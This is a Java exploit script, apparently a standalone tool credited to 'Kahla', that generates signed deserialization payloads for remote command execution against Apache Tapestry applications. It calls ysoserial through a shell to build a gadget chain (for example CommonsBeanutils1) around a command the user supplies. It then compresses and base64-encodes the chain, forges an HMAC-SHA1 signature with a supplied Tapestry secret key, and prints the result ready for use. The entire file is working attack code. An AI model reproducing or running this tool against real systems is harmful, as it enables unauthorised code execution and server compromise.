Exploit.java

import java.io.*;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import org.apache.commons.codec.binary.Base64;
public class Exploit {
// First arg is tapestry key
// second arg is payload type
    private static final String HMAC_SHA1 = "HmacSHA1";
    public static String run(String command){
	try {
    	//	String command="sh -c $@|sh . echo java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 ls|gzip|base64|tr -d \"\n\"";
		String result="";
  		Process process = Runtime.getRuntime().exec(command);
		BufferedReader reader = new BufferedReader(
       	        new InputStreamReader(process.getInputStream()));
  		String line;
    		while ((line = reader.readLine()) != null) {
        		result=result+line;
    		}
		reader.close();
		return result ;
	} 
	catch (IOException e) {
    		e.printStackTrace();
		return "ERROR";
	}
}

    public static void main(String[] args) {
      if( args.length <3)
	{
		System.out.println("[Usage]: java -cp commons-codec-1.15/commons-codec-1.15.jar:. Exploit [Tapestry Key] [Ysoserial Payload] [Command To Execute]");
		System.exit(0);
	}



	Mac sha1Hmac;
        byte[] result;
        final String key = args[0];
	final String type= args[1];
	final String command="sh -c $@|sh . echo "+args[2];
        try {
            final byte[] byteKey = key.getBytes(StandardCharsets.UTF_8);
            sha1Hmac = Mac.getInstance(HMAC_SHA1);
            SecretKeySpec keySpec = new SecretKeySpec(byteKey, HMAC_SHA1);
            sha1Hmac.init(keySpec);
	    String ysoCommand="sh -c $@|sh . echo java -jar ysoserial-master-d367e379d9-1.jar "+type+" '"+command+"'|gzip|base64|tr -d \"\n\"";
	    String payload=run(ysoCommand);
            byte[] array = payload.getBytes();
	    byte[] b64out=Base64.decodeBase64(array);
	    sha1Hmac.update(b64out);
	    byte[] macData = sha1Hmac.doFinal();
            result = Base64.encodeBase64(macData);
	    System.out.println(new String(result)+":"+payload);
        } catch ( InvalidKeyException | NoSuchAlgorithmException e) {
            e.printStackTrace();
        } finally {
            // Put any cleanup here
            System.out.println("Payload generated successfully!\nAuthor: Kahla");
        }
    }
}